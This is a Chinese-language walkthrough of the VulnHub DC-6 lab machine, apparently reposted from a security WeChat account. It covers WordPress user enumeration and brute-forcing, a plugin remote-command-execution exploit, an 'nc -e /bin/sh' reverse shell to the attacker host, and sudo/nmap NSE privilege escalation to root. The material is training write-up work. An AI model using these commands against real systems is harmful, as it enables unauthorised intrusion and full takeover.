DC系列——DC6靶机渗透测试(未修改)

admin
admin
admin
105013
文章
87
评论
2024年5月9日15:05:22评论4 views字数 2475阅读8分15秒阅读模式
DC系列——DC6靶机渗透测试(未修改)

现在只对常读和星标的公众号才展示大图推送,建议大家能把GG安全“设为星标”,否则可能就看不到了啦!

DC系列——DC6靶机渗透测试(未修改)

免责声明

本文章仅用于分享信息安全防御技术,请遵守中华人民共和国相关法律法规,禁止进行任何违法犯罪行为。作者不承担因他人滥用本文所导致的任何法律责任。

本公众号及其发布的内容的使用者需自行承担由此产生的任何直接或间接的后果和损失,GG安全公众号和原文章作者不承担任何责任。如果出现任何后果,请使用者自行承担。如果有侵权行为,请告知我们,我们将立即删除并致以道歉。谢谢!

知识先导

GG安全

vulnhub靶场地址:www.vulnhub.com

DC系列简介:DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场。

前期准备

1、下载靶场

靶机名称:DC-6(包含1个flag)

下载地址:

https://www.vulnhub.com/entry/dc-6,315/

2、安装靶场

以DC-1为例,将文件解压(一压缩包形式进行下载)。

DC系列——DC6靶机渗透测试(未修改)

打开虚拟机,选择解压好的文件导入虚拟机( vof 版本高于4.0,点击重试即可导入)

导入成功,开启此虚拟机( 当页面出现 DC-2 login 时表示安装成功)。

前提:DC-6和kali在同一网段 

已知kali的IP地址(ifconfig)

—— kali IP地址:192.168.108.129/24

已知DC-5所在的网段

—— DC-6 IP地址:192.168.130.138/24

信息收集

获取DC-6的IP地址

命令:

netdiscover -r 192.168.108.0/24

DC系列——DC6靶机渗透测试(未修改)

由图可知DC-6的IP地址是:192.168.108.138/24

端口扫描

命令:

nmap -sV -p- 192.168.108.138  //-sV:扫描系统版本和程序版本号检测,-p-:全端口扫描

DC系列——DC6靶机渗透测试(未修改)

获取信息如下:

端口号

服务

版本

22

ssh

7.4p1

80

http

Apche 2.4.25

查看80端口的服务,并且对其进行CMS识别

DC系列——DC6靶机渗透测试(未修改)

80端口无法访问,但是有显示wordy,重新编辑hosts文件并访问

DC系列——DC6靶机渗透测试(未修改)

DC系列——DC6靶机渗透测试(未修改)

文件扫描

dirsearch -u "http://wordy"

DC系列——DC6靶机渗透测试(未修改)

后台管理界面

URL:http://wordy/wp-login.php?redirect_to=http%3A%2F%2Fwordy%2Fwp-admin%2F&reauth=1

DC系列——DC6靶机渗透测试(未修改)

漏洞利用

使用 WPScan
wpscan --url http://wordy/

DC系列——DC6靶机渗透测试(未修改)

获取到的信息
    WordPress版本:5.1.1、使用的主题:twentyseventeen
枚举出了五个用户名
wpscan --url http://wordy --enumerate u//五个用户名:admin、graham、mark、sarah、jens

DC系列——DC6靶机渗透测试(未修改)

在这里根据靶场简介给出的提示,可以直接进行暴力破解

DC系列——DC6靶机渗透测试(未修改)

DC系列——DC6靶机渗透测试(未修改)

直接跑发现字典太大了,这里又去看了官方的提示,再使用命令过滤一下

wpscan --url http://wordy -P wordypasswd.txt -U wordyuser.txt#用户名为 wordyuser.txt 字典文件中的数据,密码为 wordypasswd.txt 字典文件中的数cat wordypasswd.txt | grep k01 > wordypasswd1.txt

DC系列——DC6靶机渗透测试(未修改)

getshell

使用 mark 的账号密码成功登录到后台管理页面

DC系列——DC6靶机渗透测试(未修改)

后台管理页面里面找到了一个IP地址转换的工具

DC系列——DC6靶机渗透测试(未修改)

DC系列——DC6靶机渗透测试(未修改)

可以看到这里有一个插件(Activity monitor),还可以对输入的IP地址进行计算,可能会存在SQL注入的漏洞
sqlmap梭哈尝试,结果什么都没有

DC系列——DC6靶机渗透测试(未修改)

那么直接查看这个插件的历史漏洞吧
searchsploit Activity monitor

DC系列——DC6靶机渗透测试(未修改)

最后一个是远程命令执行的脚本文件

查看该脚本文件

searchsploit -x php/webapps/50110.py
复制到kali上,执行getshell(python wordy.py)

DC系列——DC6靶机渗透测试(未修改)

DC系列——DC6靶机渗透测试(未修改)

这里发现了一个问题,目前得到的shell并不稳定,一切换目录就崩了

DC系列——DC6靶机渗透测试(未修改)

重新反弹一个吧,顺手一起改善一下shell交互的环境
nc -lvvp 6868nc -e /bin/sh 192.168.108.129 6868python -c "import pty;pty.spawn('/bin/bash')"

DC系列——DC6靶机渗透测试(未修改)

提权&获取flag

提权
试一下suid提权吧
find / -perm -4000 2>/dev/null #寻找有SUID权限(4000)的文件,不显示其他的错误信息相当于过滤
很不幸,这里并没有看到常用的SUID提权命令(nmap、vim、find、bash、more、less、nano、cp 等)

DC系列——DC6靶机渗透测试(未修改)

依旧是去家目录下看看有没有什么敏感信息泄露

DC系列——DC6靶机渗透测试(未修改)

直接执行backups.sh文件的话这里显示没有权限

DC系列——DC6靶机渗透测试(未修改)

没关系,去看看mark用户家目录下的文件夹里面有什么东西

DC系列——DC6靶机渗透测试(未修改)

获得账号密码(graham、GSo7isUM1D4)之后直接切换用户
sudo -l #查询到当前用户可以使用sudo执行的命令

DC系列——DC6靶机渗透测试(未修改)

尝试写入/bin/bash,直接免密码切换到 jens 用户
echo "/bin/bash" >> backups.shsudo -u jens ./backups.sh

DC系列——DC6靶机渗透测试(未修改)

继续查看sudo可执行的命令

DC系列——DC6靶机渗透测试(未修改)

利用 nmap 提权
原理:nmap 可以执行脚本文件,可以创建一个文件并写入反弹 shell 的命令,默认用root 权限执行,所以反弹的 shell 也是 root
echo 'os.execute("/bin/bash")' > shell.nse #创建一个 shell.nse 的文件,并且写入 os.execute("/bin/bash")解释:--script: 指定自己的脚本文件    nes的使用  nmap --script 脚本名称 目标cat shell.nsesudo -u root nmap --script=shell.nse   #以root用户执行 nmap

DC系列——DC6靶机渗透测试(未修改)

猎杀时刻

再次声明:本公众号及其发布的内容的使用者需自行承担由此产生的任何直接或间接的后果和损失,GG安全公众号和原文章作者不承担任何责任。

DC系列——DC6靶机渗透测试(未修改)

原文始发于微信公众号(GG安全):DC系列——DC6靶机渗透测试(未修改)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月9日15:05:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   DC系列——DC6靶机渗透测试(未修改)https://cn-sec.com/archives/2720563.html

发表评论

匿名网友 填写信息